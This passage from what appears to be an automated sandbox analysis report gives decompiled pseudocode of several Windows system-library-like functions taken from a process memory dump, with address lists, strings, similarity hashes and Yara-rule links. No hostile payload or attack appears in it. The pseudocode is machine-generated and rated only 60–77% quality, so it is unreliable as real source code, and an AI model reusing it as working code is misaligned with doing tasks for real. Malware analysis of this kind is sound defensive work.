									E014ABB40(_t84, _t102 + 0x24, _t94);
									if(L014743C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                    0x0146e620
                    0x0146e628
                    0x0146e62f
                    0x0146e631
                    0x0146e635
                    0x0146e637
                    0x0146e63e
                    0x014c5503
                    0x014c5503
                    0x0146e64c
                    0x0146e64c
                    0x0146e651
                    0x00000000
                    0x00000000
                    0x0146e661
                    0x0146e665
                    0x014c542a
                    0x0146e715
                    0x0146e71a
                    0x0146e71c
                    0x0146e720
                    0x0146e720
                    0x0146e727
                    0x0146e736
                    0x0146e736
                    0x0146e743
                    0x0146e743
                    0x0146e673
                    0x0146e678
                    0x0146e67d
                    0x0146e682
                    0x0146e685
                    0x0146e692
                    0x0146e69b
                    0x0146e6a3
                    0x0146e6ad
                    0x0146e6b1
                    0x0146e6b2
                    0x0146e6bb
                    0x0146e6bf
                    0x0146e6c0
                    0x0146e6c8
                    0x0146e6cc
                    0x0146e6d5
                    0x0146e6d9
                    0x00000000
                    0x00000000
                    0x0146e6e5
                    0x0146e6ea
                    0x0146e6f9
                    0x0146e70b
                    0x0146e70f
                    0x014c5439
                    0x014c545e
                    0x014c545e
                    0x00000000
                    0x014c545e
                    0x014c543b
                    0x014c543e
                    0x014c5440
                    0x014c5445
                    0x014c5472
                    0x014c5475
                    0x014c548d
                    0x014c5493
                    0x014c54a9
                    0x00000000
                    0x00000000
                    0x014c54ab
                    0x014c54b4
                    0x014c54bc
                    0x014c54c8
                    0x014c54de
                    0x014c54fb
                    0x014c54e0
                    0x014c54e6
                    0x014c54eb
                    0x014c54eb
                    0x014c54de
                    0x00000000
                    0x014c54bc
                    0x014c5477
                    0x014c547a
                    0x014c5480
                    0x014c5483
                    0x014c5486
                    0x014c548b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014c548b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014c5447
                    0x014c5447
                    0x014c5447
                    0x014c5447
                    0x014c544e
                    0x00000000
                    0x00000000
                    0x014c5450
                    0x014c5452
                    0x014c5455
                    0x014c545a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014c545c
                    0x014c546a
                    0x014c546d
                    0x014c546f
                    0x00000000
                    0x014c546f
                    0x0146e70f

                    Strings
                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0146E68C
                    • InstallLanguageFallback, xrefs: 0146E6DB
                    • @, xrefs: 0146E6C0
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                    • API String ID: 0-1757540487
                    • Opcode ID: 0348e921293634115cbb010e760ff769d255f319d752e8fdae21e9cd147f6e8d
                    • Instruction ID: be5466ab5b5bb4be908ef42fe8578dac1c1c850968c3f7338979b1d366b16cdc
                    • Opcode Fuzzy Hash: 0348e921293634115cbb010e760ff769d255f319d752e8fdae21e9cd147f6e8d
                    • Instruction Fuzzy Hash: 2551B3796083069BD710DF29D440BAFB7E8AF98615F45092FF985EB360E734E904C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0152E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                    Download Yara Rule
                    C-Code - Quality: 60%
                    			E0152E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0152BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0152BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0152AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E014A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0152A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0152A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E014A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0152A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0152A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01482280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0147B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0147FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01487D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0151FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                    0x0152e547
                    0x0152e549
                    0x0152e54f
                    0x0152e553
                    0x0152e557
                    0x0152e55a
                    0x0152e55c
                    0x0152e55f
                    0x0152e561
                    0x0152e567
                    0x0152e56b
                    0x0152e7e2
                    0x00000000
                    0x0152e571
                    0x0152e575
                    0x0152e577
                    0x0152e57b
                    0x0152e57c
                    0x0152e57d
                    0x0152e57e
                    0x0152e57f
                    0x0152e588
                    0x0152e58f
                    0x0152e591
                    0x0152e592
                    0x0152e592
                    0x0152e596
                    0x0152e59e
                    0x0152e5a0
                    0x0152e5a6
                    0x0152e61d
                    0x0152e61d
                    0x0152e621
                    0x0152e623
                    0x0152e630
                    0x0152e630
                    0x0152e7e6
                    0x0152e7eb
                    0x0152e7ed
                    0x0152e7f4
                    0x0152e7fa
                    0x0152e7ff
                    0x0152e7ff
                    0x0152e80a
                    0x0152e812
                    0x0152e812
                    0x0152e5ab
                    0x0152e5b4
                    0x0152e5b9
                    0x0152e5be
                    0x0152e5c0
                    0x0152e5c2
                    0x0152e5c8
                    0x0152e5c9
                    0x0152e5cb
                    0x0152e5cc
                    0x0152e5d5
                    0x0152e5e4
                    0x0152e5f1
                    0x0152e5f8
                    0x0152e5f8
                    0x0152e5d5
                    0x0152e602
                    0x0152e616
                    0x0152e63d
                    0x0152e644
                    0x0152e64d
                    0x0152e652
                    0x0152e657
                    0x0152e659
                    0x0152e65b
                    0x0152e661
                    0x0152e662
                    0x0152e664
                    0x0152e665
                    0x0152e66e
                    0x0152e67d
                    0x0152e68a
                    0x0152e691
                    0x0152e691
                    0x0152e66e
                    0x0152e6b0
                    0x00000000
                    0x0152e6b6
                    0x0152e6bd
                    0x0152e6c7
                    0x0152e6d7
                    0x0152e6d9
                    0x0152e6db
                    0x0152e6de
                    0x0152e6e3
                    0x0152e6f3
                    0x0152e6fc
                    0x0152e700
                    0x0152e700
                    0x0152e704
                    0x0152e70a
                    0x0152e70a
                    0x0152e713
                    0x0152e716
                    0x0152e719
                    0x0152e720
                    0x0152e761
                    0x0152e76b
                    0x0152e774
                    0x0152e77a
                    0x0152e77a
                    0x0152e78a
                    0x0152e791
                    0x0152e799
                    0x0152e79b
                    0x0152e79f
                    0x0152e7aa
                    0x0152e7c0
                    0x0152e7ac
                    0x0152e7b2
                    0x0152e7b9
                    0x0152e7b9
                    0x0152e7c7
                    0x0152e806
                    0x00000000
                    0x0152e7c9
                    0x0152e7d1
                    0x0152e7d8
                    0x00000000
                    0x0152e7d8
                    0x00000000
                    0x00000000
                    0x0152e722
                    0x0152e72e
                    0x0152e748
                    0x0152e74c
                    0x0152e754
                    0x0152e756
                    0x0152e75c
                    0x0152e75c
                    0x00000000
                    0x0152e75c
                    0x0152e758
                    0x0152e758
                    0x00000000
                    0x0152e758
                    0x0152e750
                    0x00000000
                    0x00000000
                    0x0152e752
                    0x00000000
                    0x0152e752
                    0x0152e730
                    0x0152e735
                    0x0152e73d
                    0x0152e73f
                    0x00000000
                    0x00000000
                    0x0152e741
                    0x0152e741
                    0x00000000
                    0x0152e741
                    0x0152e739
                    0x00000000
                    0x00000000
                    0x0152e73b
                    0x00000000
                    0x0152e73b
                    0x0152e722
                    0x0152e720
                    0x0152e6b0
                    0x0152e618
                    0x00000000
                    0x0152e618

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction ID: d85b13fc0a9e3aa4df300051e4a3ee8cd5460caf46797d3c422fa906faf9ca0d
                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction Fuzzy Hash: 479170322043529BE725CE29C842B5BBBE5FF85714F18892DFA95CB2D0E774E904CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 014E51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E014E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x15405f0);
				E014BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0147EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E014E53CA(0);
						return E014BD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E014AF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01483690(1, _t117, 0x1441810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E014AAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01484620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E014AAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E014E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E014A9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                    0x014e51be
                    0x014e51c3
                    0x014e51c8
                    0x014e51cd
                    0x014e51d0
                    0x014e51d3
                    0x014e51d8
                    0x014e51db
                    0x014e51de
                    0x014e51e0
                    0x014e51e3
                    0x014e51e6
                    0x014e51e8
                    0x014e5342
                    0x014e5351
                    0x014e5356
                    0x014e535a
                    0x014e5360
                    0x014e5363
                    0x014e5366
                    0x014e5369
                    0x014e5369
                    0x014e536b
                    0x014e536b
                    0x014e5370
                    0x014e53a3
                    0x014e53a4
                    0x014e53a6
                    0x014e53ab
                    0x014e53ab
                    0x014e53ae
                    0x014e53ae
                    0x014e53b5
                    0x014e53bf
                    0x014e53bf
                    0x014e5375
                    0x014e5396
                    0x014e53a0
                    0x014e53a0
                    0x00000000
                    0x014e5396
                    0x014e5377
                    0x014e5379
                    0x014e537f
                    0x014e538c
                    0x014e5390
                    0x00000000
                    0x014e5390
                    0x014e51ee
                    0x014e51f1
                    0x014e5301
                    0x014e5310
                    0x014e5315
                    0x014e5318
                    0x014e531b
                    0x014e5320
                    0x014e532e
                    0x014e5331
                    0x00000000
                    0x014e5331
                    0x014e5328
                    0x014e5329
                    0x00000000
                    0x014e5329
                    0x014e51fa
                    0x014e5235
                    0x014e5236
                    0x014e5239
                    0x014e523f
                    0x014e5240
                    0x014e5241
                    0x014e5242
                    0x014e5246
                    0x014e5247
                    0x014e524e
                    0x014e5251
                    0x014e5267
                    0x014e5269
                    0x014e526e
                    0x014e527d
                    0x014e527e
                    0x014e5281
                    0x014e5282
                    0x014e5287
                    0x014e5288
                    0x014e528a
                    0x014e528f
                    0x014e5294
                    0x00000000
                    0x00000000
                    0x014e529a
                    0x014e529c
                    0x014e529e
                    0x014e529e
                    0x014e52a4
                    0x014e52b0
                    0x00000000
                    0x00000000
                    0x014e52ba
                    0x014e52bc
                    0x014e52bc
                    0x014e52d4
                    0x014e52d9
                    0x014e52dc
                    0x014e52e1
                    0x00000000
                    0x00000000
                    0x014e52e7
                    0x014e52f4
                    0x00000000
                    0x014e52f4
                    0x014e5270
                    0x00000000
                    0x014e5270
                    0x014e51fc
                    0x014e51fd
                    0x014e5202
                    0x014e5203
                    0x014e5205
                    0x014e520a
                    0x014e520f
                    0x00000000
                    0x00000000
                    0x014e521b
                    0x014e5226
                    0x014e522b
                    0x014e521d
                    0x014e521d
                    0x014e5222
                    0x014e5222
                    0x014e522d
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 5a274e976c52455230d5b445c5f19bdf8f49956f529c24d06947fc7f21d4056a
                    • Instruction ID: ab391ab91809cf248df566fc1960c5e0fdbbee9b43d250e89001dc4d91ead01f
                    • Opcode Fuzzy Hash: 5a274e976c52455230d5b445c5f19bdf8f49956f529c24d06947fc7f21d4056a
                    • Instruction Fuzzy Hash: D5517E75E006099FDB24DFA9C984AAEBBF8FF58709F14442EE649EB261D7709901CB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0148B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E0148B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x155d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01487D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01538CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E014A9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E014AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E014ACE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01487D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01538F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E014AAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1558628; // 0x0
								_v68 = _t77;
								_t78 =  *0x155862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1558628; // 0x0
							_t116 =  *0x155862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                    0x0148b94c
                    0x0148b956
                    0x0148b95c
                    0x0148b95e
                    0x0148b964
                    0x0148b969
                    0x0148b96d
                    0x0148b96d
                    0x0148b970
                    0x0148b974
                    0x0148b97a
                    0x0148badf
                    0x0148badf
                    0x0148bae2
                    0x0148bae4
                    0x0148bae6
                    0x0148baf0
                    0x014d2cb8
                    0x0148baf6
                    0x0148baf6
                    0x0148baf6
                    0x0148bafd
                    0x0148bb1f
                    0x0148bb1f
                    0x0148baff
                    0x0148bb00
                    0x0148bb00
                    0x0148bb03
                    0x0148bb03
                    0x0148bacb
                    0x0148bacf
                    0x0148bad0
                    0x0148bad1
                    0x0148badc
                    0x0148badc
                    0x0148b980
                    0x0148b980
                    0x0148b988
                    0x0148b98b
                    0x0148b98d
                    0x0148b990
                    0x0148b993
                    0x0148b999
                    0x0148b99b
                    0x0148b9a1
                    0x0148b9a5
                    0x0148b9aa
                    0x0148b9b0
                    0x0148b9bb
                    0x0148b9c0
                    0x0148b9c3
                    0x0148b9ca
                    0x0148b9cc
                    0x0148b9cf
                    0x0148b9d3
                    0x0148b9d7
                    0x0148ba94
                    0x0148ba94
                    0x0148ba98
                    0x0148baa3
                    0x014d2ccb
                    0x0148baa9
                    0x0148baa9
                    0x0148baa9
                    0x0148bab1
                    0x014d2cd5
                    0x014d2cdd
                    0x014d2cdd
                    0x0148babb
                    0x0148babc
                    0x0148bac2
                    0x0148bac3
                    0x0148bac3
                    0x0148bac6
                    0x00000000
                    0x0148b9dd
                    0x0148b9dd
                    0x0148b9e7
                    0x0148b9e7
                    0x0148b9ec
                    0x0148b9ec
                    0x0148b9f1
                    0x0148b9f5
                    0x0148b9fa
                    0x0148ba00
                    0x0148ba0c
                    0x0148ba10
                    0x0148ba10
                    0x0148ba12
                    0x0148ba18
                    0x00000000
                    0x00000000
                    0x0148bb26
                    0x0148bb26
                    0x0148ba1e
                    0x0148ba1e
                    0x0148ba23
                    0x0148ba25
                    0x0148ba2c
                    0x0148ba30
                    0x0148ba35
                    0x0148ba35
                    0x0148ba41
                    0x0148ba46
                    0x0148ba4c
                    0x0148ba50
                    0x0148ba54
                    0x0148ba6a
                    0x0148ba6e
                    0x0148ba70
                    0x0148ba74
                    0x0148ba78
                    0x0148ba7a
                    0x0148ba7c
                    0x0148ba8e
                    0x0148ba90
                    0x0148ba92
                    0x0148bb14
                    0x0148bb14
                    0x0148bb16
                    0x0148bb16
                    0x00000000
                    0x0148ba7c
                    0x0148bb0a
                    0x0148bb0d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0148bb0f

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0148B9A5
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 885266447-0
                    • Opcode ID: 66ddc2aa574b1706397b800eee3a0a16091ebd023f6d5a95c36a9bfbc63c69fe
                    • Instruction ID: a7239c53fd950778c6cdc5a3bec18bf7671ba9eaa36315a0143faa4cf0fb10a0
                    • Opcode Fuzzy Hash: 66ddc2aa574b1706397b800eee3a0a16091ebd023f6d5a95c36a9bfbc63c69fe
